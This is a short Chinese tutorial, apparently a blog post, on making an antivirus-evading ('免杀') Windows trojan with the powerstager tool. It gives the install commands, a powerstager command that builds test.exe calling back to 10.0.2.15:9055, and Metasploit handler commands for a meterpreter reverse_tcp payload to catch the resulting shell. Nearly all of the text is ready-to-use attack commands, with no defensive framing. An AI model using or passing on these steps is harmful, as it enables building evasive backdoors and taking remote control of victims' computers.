本文编写于 192 天前,最后修改于 140 天前,其中某些信息可能已经过时。

利用powerstager制作免杀木马

安装powerstager

此工具需要python3的支持

apt-get install python3
apt-get install mingw-w64

项目地址

https://github.com/z0noxz/powerstager
git clone https://github.com/z0noxz/powerstager
cd powerstager
sudo ./setup.py install

制作免杀

python3 powerstager.py -m -t win64 --lhost=10.0.2.15 --lport=9055 -o /root/test.exe

会在root目录下生成一个test.exe后门程序
lhost填写kali上线IPlport上线端口

利用msfconsole监听木马

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.2.15
set lport 9055
exploit

运行木马获取shell

运行木马获取回话

火绒查杀